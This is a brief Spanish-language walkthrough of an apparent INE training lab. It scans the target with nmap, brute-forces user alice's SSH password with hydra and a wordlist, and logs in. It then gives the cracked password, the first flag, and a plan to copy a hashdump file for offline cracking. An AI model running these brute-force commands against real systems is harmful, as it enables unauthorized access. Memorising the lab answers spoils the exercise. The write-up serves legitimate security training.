Como siempre empezamos lanzando escaneo:
nmap -A target.ine.local

Como la pista dice que el user alice es inseguro y vemos que efectivamente el puerto ssh esta abierto, vamos a brute forcearlo:
hydra -l alice -P /usr/share/wordlists/metasploit/unix_passwords.txt target.ine.local ssh

Obtenemos la password —> password: princess1
Nos logueamos con ssh
ssh [email protected]

Y en su directorio vemos la flag 1: 436fca441ea34f4386cbca89df8cd7d7
Vemos tambien un archivo curioso llamado hashdump.txt lo vamos a copiar en local para hacer cracking como dice la pista.